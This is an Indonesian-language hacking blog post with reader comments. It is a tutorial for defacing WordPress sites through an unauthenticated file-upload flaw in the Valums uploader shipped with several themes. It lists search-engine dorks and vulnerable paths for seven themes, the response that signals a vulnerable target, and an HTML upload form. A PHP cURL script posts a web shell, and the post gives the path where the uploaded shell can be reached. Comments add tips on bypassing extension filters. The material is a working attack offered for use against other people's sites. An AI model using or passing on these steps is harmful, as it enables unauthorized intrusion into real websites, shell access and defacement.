Tuesday, 20 December 2016

eXploit WordPress Valums Uploader Shell Upload


Hello World ; Malamm Fans, Please Say Hello Haters ;*
xixixhihi, kali ini gua bakal Share salah satu Bug yang ada pada beberapa Themes di CMS WordPress
sebenernye sih ini eXploit lawas, kali aja msh crotz
yupz, Nue bakal Share Tutorial Deface dengan eXploit WordPress Valums Uploader Shell Upload.
eXploit ini memanfaatkan Bug pada valums uploader di Themes nya :D

Lanjut intip tutorialnye ;*


1. Dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. Dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. Dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. Dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. Dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. Dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. Dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php

(kembangin Dork yang sudah ada dgn imajinasi bokepers lu, biar dapat yang vuln n verawan)


1. Dorking menggunakan Search Engine

2. Pilih target kalian, Lalu masukan eXploitnyee.
sesuaikan eXploit dengan Dork yang kalian gunakan.
contoh: target.c0li/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php
*karena disini saya dorking dgn dork eptonic themes, ya eXploitnya juga hrs ituh :D

3. Vulnerability ~ {"error":"No files were uploaded.",

kira2 sih begitu, kalo ada ciri2 vuln yang lain, komen yupz br0

Script CSRF Upload:

<form enctype="multipart/form-data"
action="target/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

*copy script diatas, ganti tulisan yang berwarna merah dgn eXploit target yang lagi kalian gunakan.
*save dgn ekstensi .html

4. Buka Script yang tadi sudah di Save dgn browser kalian , Lalu silahkan Upload Shell Lu


disini gua mencoba Bypass Ekstensi shell gua, karena target not vuln ekstensi .php
5. Jika sukses akan Muncul Notif ~ {"success":true,"



6. Shell Akses: /wp-content/uploads/tahun/bulan/namashellLu.php
contoh: target.c0li/wp-content/uploads/2016/12/nueenggak.php

Done br0~
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) )) 
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*

tambahan , ini ada Script upload .phpnya:

<?php
$uploadfile="namashell.php"; 
$ch =
curl_init("target.c0li/wordpressEXPLOIT/VALUMS_UPLOADER_PATH/php.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

*sama kek tadi, sesuaikan ama yang lu gunakan
*save dgn ekstensi .php
*bila memakai script upload yang ini, Shell Akses nya sama aja kok :D

"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

owh iya, Bila ada Link atau gambar pada Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART

Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked~
Sekian dan semoga bermanfaat .. terimakasih

source and thanks to: Packet Storm


./Nuenomaru

Buang semua Mimpi yang takkan Kembali, Rangkailah kisah yang Berbeda








Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

9 comments

bro, ga ada demo nya ni? biar para pembaca paham

Semua tutorial yang ada di Blog ini, Full SS Praktek kami semua..
step by step nya semua juga di jelasin,, dan full gambar praktek kami..
masa kek dah full ss dan full step by step tetep gak paham bro ??

gimana ente baca di exploit-DB dan 0day, atau forum2 exploit yang lain ??
cuma di kasih dork, exploit, poc, shell akses o.O ??

utk pemahaman bukan cuma dari sisi si penulis, tapi juga dari sisi si pembaca :)

#Nuenomaru

Ntapz stah _/|\_ berikan ilmu pda nubi seperti aku

shell yang diupload harus berekstensi apa bang ?

Udah lama kaga aktif stahh.. Agak tumpul nih

umumnya sih .php juga bisa bang.
tapi ketika filter tak mengizinkan upload ekstensi .php, silahkan bypass ektensi shell ente, salah satu contoh nya seperti ss praktek di artikel.

semoga sukses selalu...

#Nuenomaru

akwkakak tetap di asah,, and ojo kendor om wkwkw

#Nuenomaru

Sukses upload, tapi pas diakses kok gak ada ya?


EmoticonEmoticon